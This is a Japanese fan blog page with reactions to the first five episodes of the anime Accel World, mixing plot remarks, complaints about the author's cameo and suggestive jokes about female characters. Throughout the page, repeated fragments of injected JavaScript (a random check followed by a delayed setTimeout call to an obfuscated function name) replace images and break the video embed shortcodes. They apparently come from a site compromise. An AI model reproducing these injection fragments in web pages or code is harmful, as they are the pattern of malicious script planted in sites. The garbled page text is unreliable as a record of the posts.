カレンダー

2019年10月
« 2月  
 12345
6789101112
13141516171819
20212223242526
2728293031 

【アニメ感想】アクセル・ワールド #5「Aviation;飛翔」

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”1335434387″]

ネタバレあり




dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
左の青いのは、ツインテとポニーじゃないから違うか。
黄色、ピンク、緑は常連さんだね。




dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
そして、作者。
ニコニコ動画をみているのか。

それはさておき、ニコニコ動画のコメントでも、作者は最初断ったとあるけど、出てしまったら言い訳にしかならないよね。
作者もやっぱり叩かれて凹んでいるかもしれないけど、仕方ないのかも。

さすが棒読みすぎて、ものすごく覚めてしまう。

出演させられた作者も不幸だし、見る人も不幸。
誰得?

作者が断ったとかいう話の真偽はわからないけど、誰が作者をだそうと考えたのか
それで誰か得するトでも思ったのかな?

記念に出るってのはもういいかなと思うので、さすがにこのあたりで出演終わって欲しいね。
(飛行アビリティの解説を素人にさせちゃだめでしょ。どんだけスタッフ無能なの)





dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
ぱふぱふしているように思えた。
シリアスシーンなのに、つい・・・

そして、先輩の胸、とても固いです・・・とかのネタが頭によぎる・・・・だめだ。




dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
あらすぎでも、前回の予告でもネタバレされていた翼ですね。
片足になった状態の動きは結構ちゃんと書いてあっていいなと思いました。
翼のお陰で歩けるように見えたりね。




dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
タクムが突然改心したように見えたのが残念だけど、まあ、いいかな。




dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
黒雪姫の手つきがエロすぎです。



dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
そして、ニコニコ動画のコメントで黒雪姫の胸がコンプレックスはひどい。
いや、私も思ったけどね。これからも胸ネタでいじられそうだ。




dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
三つ編みのほうが可愛いじゃないですか。
可愛い!!

ほむほむ・・・いや、関係ない。

【アニメ感想】アクセル・ワールド #4「Declaration;告白」

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”1335433700″]

ネタバレあり

現在、原作1巻の内容。


dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
いきなりの展開できゃっほー。
夢オチだけどね!!
ブラチラとか、えろいぜチユリ!!



dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
そして、先輩の絶壁。すさまじいい。



dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
直結をしてショックを受ける先輩。
こういうにやにやシーンはもっと増えて欲しい。



dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
嫉妬ですよ、奥さん。
このあと新聞部がきて、それは嫉妬ですよ。とか話があり、
その後、ハルユキは、ネガティブ思考になるんですよね。




dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
購買部で売っている一番短いケーブルをせっかくかって、ハルユキが照れていやがるかもしれないけど
と、ごにょごにょ言いながら直結しようとしたら、あっさりつながれて面食らったとかの描写は難しいか。

この辺はネガティブな割り切りだったけど、だんだんとハルユキが前向きに吹っ切れていくのがいいですよね。

予告でネタバレがあって、笑ったけど、次で原作1巻は終わりなのかな。

にやにや成分は少なかったけど、今回も楽しませてもらった。

【アニメ感想】アクセル・ワールド #3「Investigation;探索」

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”1334746581″]

ネタバレあり

現在、原作1巻の内容。


dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
チユリのことになると不機嫌になる先輩。
それはともかく、ここではチユリの身の潔白を図るため、思わず直結して調べることをいうんだけど
そういった表現は乏しかったですね。
まあ、十分にやにやしたからいいですが。



dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
原作だとベットに寝てって表現だったけど、映像があるといやらしさ倍増ですね。
これは近づくの厳しいです。
鉄壁のスカート。



dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
むくれているチユリ可愛い。
なんかアニメ化したら、チユリが可愛く思える。
30cmの距離・・・

映像で見ると改めて短いのがよくわかります。
これはドキドキする。
恋人じゃないと無理だな。

ハルユキ爆発しろ!



dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
ここで邪なシーンに見えた人は何人いるのだろうか。
これだけみたら、エッチなことしようとしたときに泣かれた状態に見える・・・
そして、鉄壁スカート



dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
この泣く感じのチユリがポーズが可愛いぞ。
鉄壁のスカート。
穿いてないネタを出すべきか・・・


やはり、修羅場ってにやにやする展開いいですね。
次回ももっとにやにやさせてください。

【アニメ感想】アクセル・ワールド #2「Transformation;変移」

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”so17503518″]

ネタバレあり


現在、原作1巻の内容。



dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
ここで手をとらないあたりが、主人公の心情を表していますね。



dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
そして、にやにやする展開がキター。
ふられたという言葉で、みんな仰天。
先程、手をとってくれなかったということですね。


こういう展開が大好きだ。もっとって欲しい。
それと、このモブ子さん、かわいいな。



dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
ここでの台詞
「悔しかったら前輪回してみろ」
好きですね。
本当におちょくってる感じがいいです。




dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
さすがに、これはひどい・・・
作品を壊すだけなのでこういうのはいらないな。
作者は断れなかったのだろうか。
出て下さいと言われたら、断るのは難しいのかもね。




dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
そして、にやにや展開。もとい修羅場!?
いいぞ、いいぞー

私はこういうのが大好き。
いいところで、終わったので、次回か楽しみすぎです。

次回は、黒雪姫とチユリのジェラシーな感じでによによできそうです。

【アニメ感想】アクセル・ワールド #1「Acceleration;加速」

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”1333690516″]

ネタバレあり

原作はライトノベル。原作は途中まで読んでいる状態で最新巻である10巻はまだ未読状態です。
とはいっても、細かい部分はほとんど忘れている状態なので、もう一度読み返さないと思い出せない気もします。



dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
この世界だと、優先でつなぐのは恋人同士とか親しい間柄のみって感じなので、まわりもざわついている状態なわけですね。
正直、話の展開についていけないシーンですよね。
主人公がいきなり、リア充になってます。ちくしょうってやつですよ。

幼馴染とかいるし。。。

卑屈で、うじうじした性格なので、なかなかイライラさせてくれますが、可愛い女の子でも見て、落ち着きましょう。



dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
それはそうと、アニメだとスクールデイズの言葉っぽくないね。
原作イラストだと、言葉様じゃないですか、なんて、思ってました。

しかし、ヒロイン(黒雪姫)の姿が意外とエロっぽくみえないね。



dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
チユリとの関係とかよりさきに、
おすなよ、絶対押すなよというフリに対してすぐに伏線回収。

グローバルリンクしちゃいました。

そして、ひゃっはーーーーー!!
敵が現れました。

結構、いいテンポでいってるんじゃないでしょうか。

関係ないけど、この体型みると、「さすがの猿飛」思い出す世代です。


美人な先輩と幼馴染者女の子。
まずは、ここからスタートです。


幼馴染の女の子(チユリ)のやきもきぶりに、にやにやする準備をしておきます。
とはいっても、あんまりなかったような気もする。


豊崎さんなら、きっと黒春もとい、きっと可愛い感じでツンツンしてくれるに違いない。